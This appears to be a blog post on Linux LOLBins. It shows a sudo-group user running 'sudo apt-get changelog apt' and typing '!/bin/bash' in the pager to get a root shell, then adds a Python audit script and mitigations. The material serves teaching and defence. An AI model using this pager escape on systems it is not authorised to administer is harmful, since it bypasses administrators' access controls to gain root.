So, now that we're done poking fun at Windows, let's look at Linux. There's a nice list here of Linux commands that can pull off some veeery stupid tricks: https://gtfobins.github.io/gtfobins/find/

So, since we already talked about why you would care about LOLBins, let's just dive right in.

For no reason in particular, let's pick on apt and apt-get, since we know they are present on Debian-based systems. First we need an ordinary user, and we need to find out whether that user is in the sudo group. Let's start our investigation.

# cat /etc/group

cat /etc/group

# bingo, we have a user in sudo

sudo:x:27:nx

# list the groups the current user (nx) belongs to

nx@xeon:~$ groups
nx cdrom floppy sudo audio dip video plugdev netdev debian-tor bluetooth kali-trusted lpadmin scanner
nx@xeon:~$ 

# list all group memberships for the user nx

groups nx
nx : nx cdrom floppy sudo audio dip video plugdev netdev debian-tor bluetooth kali-trusted lpadmin scanner

# list members of group sudo

getent group sudo
sudo:x:27:nx
nx@xeon:~$ 

Now we have a user that is a member of the sudo group, so we're good to go. Time for some fun.

# call apt-get changelog (the changelog is displayed in a pager)

sudo apt-get changelog apt

# output

 * Bump codenames to bullseye/hirsute and adjust -security codename for
    bullseye (Closes: #969932)
  * Ignore failures from immediate configuration. This does not change the
    actual installation ordering - we never passed the return code to the
    caller and installation went underway anyway if it could be ordered at a
    later stage, this just removes spurious after-the-fact errors.
    (Closes: #973305, #188161, #211075, #649588) (LP: #1871268)
  * Add support for Phased-Update-Percentage, previously used only by
    update-manager.
  * Implement update --error-on=any so that scripts can reliably check for
    transient failures as well. (Closes: #594813)

# call bash from the pager prompt

  * Add support for Phased-Update-Percentage, previously used only by
    update-manager.
  * Implement update --error-on=any so that scripts can reliably check for
    transient failures as well. (Closes: #594813)
!/bin/bash

# output after pressing Enter; notice we're now running as root

nx@xeon:~$ sudo apt-get changelog apt
Henter:1 store: apt 2.1.17 Changelog
Hentede 482 kB på 0s (33,9 MB/s)
root@xeon:/home/nx# 

So, there you go: a detour from user to root in ten seconds :)
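As an added defensive example (my own code, not part of the original post), here is a small Python audit that does by script what the post walks through by hand: it parses an /etc/group file to list members of the sudo group, and it scans sudo's auth.log records for privileged apt or apt-get changelog invocations, which hand a root-owned pager to the caller. The group file and log lines are constructed samples modelled on the output above, and the set of flagged subcommands (PAGER_ESCAPES) is an assumption covering only the case from this post; extend it from GTFOBins for your own hosts.

```python
"""Audit helpers for the sudo -> pager escape shown above.

Added example, not part of the original post. It reproduces by script what
the post does by hand: find members of the sudo group in an /etc/group file,
and flag sudo log entries where apt / apt-get changelog was run as root,
because that command hands a root-owned pager (and its '!' shell command)
to the caller. The sample inputs below are constructed to mirror the post.
"""
import os
import re
import sys
from typing import Dict, List

# Constructed /etc/group excerpt modelled on the post (user nx in group sudo).
SAMPLE_GROUP_FILE = """root:x:0:
sudo:x:27:nx
audio:x:29:nx,pulse
users:x:100:
"""

# Constructed auth.log lines in the format sudo logs through syslog.
SAMPLE_AUTH_LOG = """Jan 10 10:01:02 xeon sudo:       nx : TTY=pts/0 ; PWD=/home/nx ; USER=root ; COMMAND=/usr/bin/apt-get changelog apt
Jan 10 10:01:05 xeon sudo:       nx : TTY=pts/0 ; PWD=/home/nx ; USER=root ; COMMAND=/usr/bin/apt-get update
Jan 10 10:02:11 xeon sudo:     root : TTY=pts/1 ; PWD=/root ; USER=root ; COMMAND=/usr/bin/apt list --installed
"""

# Assumption: subcommands that open a pager under the caller's control.
# Only the apt/apt-get case from the post is listed; extend from GTFOBins.
PAGER_ESCAPES = {
    "apt-get": {"changelog"},
    "apt": {"changelog"},
}

# sudo command record: "<user> : TTY=... ; PWD=... ; USER=<target> ; COMMAND=<cmd>"
SUDO_LINE = re.compile(
    r"sudo:\s+(?P<user>\S+) : .*?USER=(?P<target>\S+) ; COMMAND=(?P<cmd>.+)$"
)


def parse_groups(text: str) -> Dict[str, List[str]]:
    """Map group name -> member list from /etc/group content (name:pw:gid:members)."""
    groups: Dict[str, List[str]] = {}
    for line in text.splitlines():
        parts = line.rstrip("\n").split(":")
        if len(parts) < 4 or not parts[0]:
            continue  # blank or malformed line
        groups[parts[0]] = [m for m in parts[3].split(",") if m]
    return groups


def sudo_group_members(text: str, group: str = "sudo") -> List[str]:
    """Same answer as `getent group sudo`, but over a file you hand in."""
    return parse_groups(text).get(group, [])


def flag_pager_escapes(log_text: str) -> List[Dict[str, str]]:
    """Return sudo invocations whose command opens a pager as the target user."""
    hits = []
    for line in log_text.splitlines():
        m = SUDO_LINE.search(line)
        if not m:
            continue  # not a command record (e.g. pam session open/close)
        argv = m.group("cmd").split()
        if not argv:
            continue
        binary = os.path.basename(argv[0])
        if len(argv) >= 2 and argv[1] in PAGER_ESCAPES.get(binary, set()):
            hits.append({"user": m.group("user"),
                         "target": m.group("target"),
                         "command": m.group("cmd")})
    return hits


def report(group_text: str, log_text: str) -> List[str]:
    """Findings as lines, returned rather than printed so they can be checked."""
    members = ", ".join(sudo_group_members(group_text)) or "(none)"
    lines = [f"sudo group members: {members}"]
    for h in flag_pager_escapes(log_text):
        lines.append(f"pager escape risk: {h['user']} ran '{h['command']}' as {h['target']}")
    return lines


if __name__ == "__main__":
    # Pass real paths (e.g. /etc/group /var/log/auth.log) to audit a host;
    # with no arguments the constructed samples above are used.
    if len(sys.argv) == 3:
        group_text = open(sys.argv[1]).read()
        log_text = open(sys.argv[2]).read()
    else:
        group_text, log_text = SAMPLE_GROUP_FILE, SAMPLE_AUTH_LOG
    print("\n".join(report(group_text, log_text)))
```

On a Debian host the two cheap mitigations follow directly from the findings: keep apt-get out of sudo rules for accounts you do not fully trust, and, where the pager is less, make sure the root-run pager has LESSSECURE=1 in its environment, which puts less in secure mode and disables the ! shell command among other things.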
